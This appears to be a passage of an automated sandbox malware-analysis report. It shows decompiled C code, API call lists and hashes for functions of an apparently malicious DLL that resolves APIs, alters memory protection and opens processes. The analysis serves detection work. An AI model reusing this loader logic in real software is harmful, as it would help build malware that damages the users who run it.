                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4209869662-0
                                                                                                                                                                              • Opcode ID: 5c6bd98f750b8500a29b8021b27eb1d857a556e63853cbb3c21b73553301fea5
                                                                                                                                                                              • Instruction ID: 5f06ccaebdaba03593cdbe933bf065fcaf1cedbbd7d6c7f0ab3829796addcb1c
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6bd98f750b8500a29b8021b27eb1d857a556e63853cbb3c21b73553301fea5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D11BBF2904211EFEB10CF65CC44E9B7BEDAB99398F050A16F206DB04CDB30E4188BA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1C12, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E66DB1C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E66DB1112( &_v8,  &_v12,  *0x66db41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E66DB1BCB(_t22, _v8,  *0x66db41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E66DB1566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x66db4190, 0, _v8);
				}
				return _t25;
			}









                                                                                                                                                                              0x66db1c12
                                                                                                                                                                              0x66db1c15
                                                                                                                                                                              0x66db1c16
                                                                                                                                                                              0x66db1c2c
                                                                                                                                                                              0x66db1c35
                                                                                                                                                                              0x66db1c3a
                                                                                                                                                                              0x66db1c53
                                                                                                                                                                              0x66db1c3c
                                                                                                                                                                              0x66db1c4f
                                                                                                                                                                              0x66db1c4f
                                                                                                                                                                              0x66db1c57
                                                                                                                                                                              0x66db1c59
                                                                                                                                                                              0x66db1c61
                                                                                                                                                                              0x66db1c69
                                                                                                                                                                              0x66db1c71
                                                                                                                                                                              0x66db1c73
                                                                                                                                                                              0x66db1c73
                                                                                                                                                                              0x66db1c71
                                                                                                                                                                              0x66db1c83
                                                                                                                                                                              0x66db1c83
                                                                                                                                                                              0x66db1c8e

                                                                                                                                                                              APIs
                                                                                                                                                                              • StrStrIA.KERNELBASE(00000000,66DB1810,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C69
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C83
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                              • Opcode ID: 0a40f8551c3e8cdbf58ee8951383bb48f2e56e66520cf7432c093906f0e46dd7
                                                                                                                                                                              • Instruction ID: ff6f06adaacaa81b0583be3478b49148b5a1d9cbd31b8a537c3ed2c3c59e9ea1
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a40f8551c3e8cdbf58ee8951383bb48f2e56e66520cf7432c093906f0e46dd7
                                                                                                                                                                              • Instruction Fuzzy Hash: C90144F6D00114EB9B01CFA5CD40E9FBBBEAB86640F150161E602E714CEA31DE0197B4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DE2C29, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,66EFDC5C), ref: 66DE2C44
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                              • Opcode ID: 5dca1247c0d09c46b7f57ce01884c97a39ad0858b450da63160b15a2e4bb61b8
                                                                                                                                                                              • Instruction ID: bede9598605eda90b466ce8bb50e6b0e85fd76cd50827d7477da91a1662cfde2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5dca1247c0d09c46b7f57ce01884c97a39ad0858b450da63160b15a2e4bb61b8
                                                                                                                                                                              • Instruction Fuzzy Hash: E1F0EC761082E0EFEF051F7978648A03F6E97D7110B185086F79886393C574744DDF59
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DE8501, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,66DE39BC,?), ref: 66DE8516
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                              • Opcode ID: 4b85dfd3bf3d8a88e23f46e7fa5a86359fa33bb69467cf5235b2c009f96da84f
                                                                                                                                                                              • Instruction ID: 35d95bed25c05d93c4154094161e438e73c643da5b6766502b429096c5e3a4ba
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b85dfd3bf3d8a88e23f46e7fa5a86359fa33bb69467cf5235b2c009f96da84f
                                                                                                                                                                              • Instruction Fuzzy Hash: F6D0A776964395AFEF009F716C08B663BEDE3C5396F10443AFA0DC6140FA74C550CA40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1236, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			E66DB1236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x66db41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4);
				_t18 = E66DB1AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E66DB14DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E66DB1F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E66DB1030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E66DB136A(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                                                              0x66db123e
                                                                                                                                                                              0x66db1240
                                                                                                                                                                              0x66db125c
                                                                                                                                                                              0x66db126d
                                                                                                                                                                              0x66db1274
                                                                                                                                                                              0x66db12d2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1276
                                                                                                                                                                              0x66db1276
                                                                                                                                                                              0x66db1280
                                                                                                                                                                              0x66db1284
                                                                                                                                                                              0x66db1289
                                                                                                                                                                              0x66db128c
                                                                                                                                                                              0x66db1291
                                                                                                                                                                              0x66db1295
                                                                                                                                                                              0x66db129a
                                                                                                                                                                              0x66db129f
                                                                                                                                                                              0x66db12a3
                                                                                                                                                                              0x66db12a8
                                                                                                                                                                              0x66db12a9
                                                                                                                                                                              0x66db12ad
                                                                                                                                                                              0x66db12b2
                                                                                                                                                                              0x66db12ba
                                                                                                                                                                              0x66db12ba
                                                                                                                                                                              0x66db12b2
                                                                                                                                                                              0x66db12a3
                                                                                                                                                                              0x66db1295
                                                                                                                                                                              0x66db12bc
                                                                                                                                                                              0x66db12c5
                                                                                                                                                                              0x66db12c9
                                                                                                                                                                              0x66db12d3
                                                                                                                                                                              0x66db12d9
                                                                                                                                                                              0x66db12d9

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AC9
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AEB
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B01
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B17
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B2D
                                                                                                                                                                                • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B43
                                                                                                                                                                                • Part of subcall function 66DB14DE: memcpy.NTDLL(?,?,?,?,?,?,?,?,66DB1280,?,?,?,?,?,?), ref: 66DB150B
                                                                                                                                                                                • Part of subcall function 66DB14DE: memcpy.NTDLL(?,?,?), ref: 66DB153E
                                                                                                                                                                                • Part of subcall function 66DB1F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 66DB1F69
                                                                                                                                                                                • Part of subcall function 66DB1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB1069
                                                                                                                                                                                • Part of subcall function 66DB1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB10DE
                                                                                                                                                                                • Part of subcall function 66DB1030: GetLastError.KERNEL32 ref: 66DB10E4
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?), ref: 66DB12B4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2673762927-0
                                                                                                                                                                              • Opcode ID: dd5e0faaa6bbc5de03447629b0a6e8d646c505646568a4392c32092f73f0e458
                                                                                                                                                                              • Instruction ID: 1f6a5e53b768758e7b2feb804e820e4633b05f043dc018b67f8193ef501b512b
                                                                                                                                                                              • Opcode Fuzzy Hash: dd5e0faaa6bbc5de03447629b0a6e8d646c505646568a4392c32092f73f0e458
                                                                                                                                                                              • Instruction Fuzzy Hash: A311EEF6610715EFD7219BA9CC80D9B77BCAF893147040159E903D7649E7B1ED0687E0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 66DEF574, Relevance: 66.4, APIs: 44, Instructions: 432COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___getlocaleinfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1937885557-0
                                                                                                                                                                              • Opcode ID: 1292dd35ec3191d005f7a258ba019026780381556e0f9dfe3b84806f3d4b0144
                                                                                                                                                                              • Instruction ID: 61dfaed27d457a3e4273e7729a40b7abed099c4c08e9f97ab4ceef8921921686
                                                                                                                                                                              • Opcode Fuzzy Hash: 1292dd35ec3191d005f7a258ba019026780381556e0f9dfe3b84806f3d4b0144
                                                                                                                                                                              • Instruction Fuzzy Hash: 16E1ACB290021DFEEF21CBE1CC84DFF7BBDEB54748F04096AB255A2050EA75AA159770
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB146C, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x66db41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x66db41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x66db41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x66db41a8 = _t5;
					 *0x66db41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x66db41a4 = _t6;
					if(_t6 == 0) {
						 *0x66db41a4 =  *0x66db41a4 | 0xffffffff;
					}
					return 0;
				}
			}









                                                                                                                                                                              0x66db146d
                                                                                                                                                                              0x66db147b
                                                                                                                                                                              0x66db1483
                                                                                                                                                                              0x66db1488
                                                                                                                                                                              0x66db14d2
                                                                                                                                                                              0x66db14d2
                                                                                                                                                                              0x66db148a
                                                                                                                                                                              0x66db1492
                                                                                                                                                                              0x66db14ce
                                                                                                                                                                              0x66db14d0
                                                                                                                                                                              0x66db1494
                                                                                                                                                                              0x66db1494
                                                                                                                                                                              0x66db1499
                                                                                                                                                                              0x66db14a7
                                                                                                                                                                              0x66db14ac
                                                                                                                                                                              0x66db14b2
                                                                                                                                                                              0x66db14ba
                                                                                                                                                                              0x66db14bf
                                                                                                                                                                              0x66db14c1
                                                                                                                                                                              0x66db14c1
                                                                                                                                                                              0x66db14cb
                                                                                                                                                                              0x66db14cb

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,66DB17B8,73B763F0,00000000), ref: 66DB147B
                                                                                                                                                                              • GetVersion.KERNEL32 ref: 66DB148A
                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 66DB1499
                                                                                                                                                                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 66DB14B2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 845504543-0
                                                                                                                                                                              • Opcode ID: 56595e330e6b7d2c8f0e35bb74333b5bfa9c0555f6329e3e0a3fb50d0e939834
                                                                                                                                                                              • Instruction ID: 04365ce68f184c71fd3980ed675d1d17924d4d2952e334b2a11df707d6902718
                                                                                                                                                                              • Opcode Fuzzy Hash: 56595e330e6b7d2c8f0e35bb74333b5bfa9c0555f6329e3e0a3fb50d0e939834
                                                                                                                                                                              • Instruction Fuzzy Hash: C0F049F0A45230EFFF00CF6AAC057413BA6BB8A791F190019F315D90CCD77088509B04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB2485, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x66db41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x66db4240 = 1;
										__eflags =  *0x66db4240;
										if( *0x66db4240 != 0) {
											goto L60;
										}
										_t84 =  *0x66db41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x66db4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x66db41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x66db4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x66db41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x66db4240 = 1;
							__eflags =  *0x66db4240;
							if( *0x66db4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x66db4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x66db4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x66db41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                                                              0x66db248f
                                                                                                                                                                              0x66db2492
                                                                                                                                                                              0x66db2498
                                                                                                                                                                              0x66db24b6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db24b6
                                                                                                                                                                              0x66db24a0
                                                                                                                                                                              0x66db24a9
                                                                                                                                                                              0x66db24af
                                                                                                                                                                              0x66db24be
                                                                                                                                                                              0x66db24c1
                                                                                                                                                                              0x66db24c4
                                                                                                                                                                              0x66db24ce
                                                                                                                                                                              0x66db24ce
                                                                                                                                                                              0x66db24d0
                                                                                                                                                                              0x66db24d3
                                                                                                                                                                              0x66db24d5
                                                                                                                                                                              0x66db24d5
                                                                                                                                                                              0x66db24d7
                                                                                                                                                                              0x66db24da
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db24dc
                                                                                                                                                                              0x66db24de
                                                                                                                                                                              0x66db2544
                                                                                                                                                                              0x66db2544
                                                                                                                                                                              0x66db26a2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db26a2
                                                                                                                                                                              0x66db24e0
                                                                                                                                                                              0x66db24e0
                                                                                                                                                                              0x66db24e4
                                                                                                                                                                              0x66db24e6
                                                                                                                                                                              0x66db24e6
                                                                                                                                                                              0x66db24e6
                                                                                                                                                                              0x66db24e6
                                                                                                                                                                              0x66db24e9
                                                                                                                                                                              0x66db24ea
                                                                                                                                                                              0x66db24ed
                                                                                                                                                                              0x66db24ed
                                                                                                                                                                              0x66db24f1
                                                                                                                                                                              0x66db24f5
                                                                                                                                                                              0x66db2503
                                                                                                                                                                              0x66db2503
                                                                                                                                                                              0x66db250b
                                                                                                                                                                              0x66db2511
                                                                                                                                                                              0x66db2513
                                                                                                                                                                              0x66db2515
                                                                                                                                                                              0x66db2525
                                                                                                                                                                              0x66db2532
                                                                                                                                                                              0x66db2536
                                                                                                                                                                              0x66db253b
                                                                                                                                                                              0x66db253d
                                                                                                                                                                              0x66db25bb
                                                                                                                                                                              0x66db25bb
                                                                                                                                                                              0x66db253f
                                                                                                                                                                              0x66db253f
                                                                                                                                                                              0x66db253f
                                                                                                                                                                              0x66db25bd
                                                                                                                                                                              0x66db25bf
                                                                                                                                                                              0x66db26a0
                                                                                                                                                                              0x66db26a0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25c5
                                                                                                                                                                              0x66db25c5
                                                                                                                                                                              0x66db25cc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25d2
                                                                                                                                                                              0x66db25d6
                                                                                                                                                                              0x66db2632
                                                                                                                                                                              0x66db2634
                                                                                                                                                                              0x66db263c
                                                                                                                                                                              0x66db263e
                                                                                                                                                                              0x66db2640
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2642
                                                                                                                                                                              0x66db2648
                                                                                                                                                                              0x66db264a
                                                                                                                                                                              0x66db264c
                                                                                                                                                                              0x66db2661
                                                                                                                                                                              0x66db2661
                                                                                                                                                                              0x66db2663
                                                                                                                                                                              0x66db2692
                                                                                                                                                                              0x66db2699
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2699
                                                                                                                                                                              0x66db2667
                                                                                                                                                                              0x66db2668
                                                                                                                                                                              0x66db266a
                                                                                                                                                                              0x66db266c
                                                                                                                                                                              0x66db266c
                                                                                                                                                                              0x66db266e
                                                                                                                                                                              0x66db2670
                                                                                                                                                                              0x66db2672
                                                                                                                                                                              0x66db2686
                                                                                                                                                                              0x66db2686
                                                                                                                                                                              0x66db2689
                                                                                                                                                                              0x66db268b
                                                                                                                                                                              0x66db268b
                                                                                                                                                                              0x66db268c
                                                                                                                                                                              0x66db268c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2674
                                                                                                                                                                              0x66db2674
                                                                                                                                                                              0x66db2674
                                                                                                                                                                              0x66db267d
                                                                                                                                                                              0x66db267e
                                                                                                                                                                              0x66db2680
                                                                                                                                                                              0x66db2682
                                                                                                                                                                              0x66db2682
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2674
                                                                                                                                                                              0x66db2672
                                                                                                                                                                              0x66db264e
                                                                                                                                                                              0x66db2655
                                                                                                                                                                              0x66db2655
                                                                                                                                                                              0x66db2657
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2659
                                                                                                                                                                              0x66db265a
                                                                                                                                                                              0x66db265d
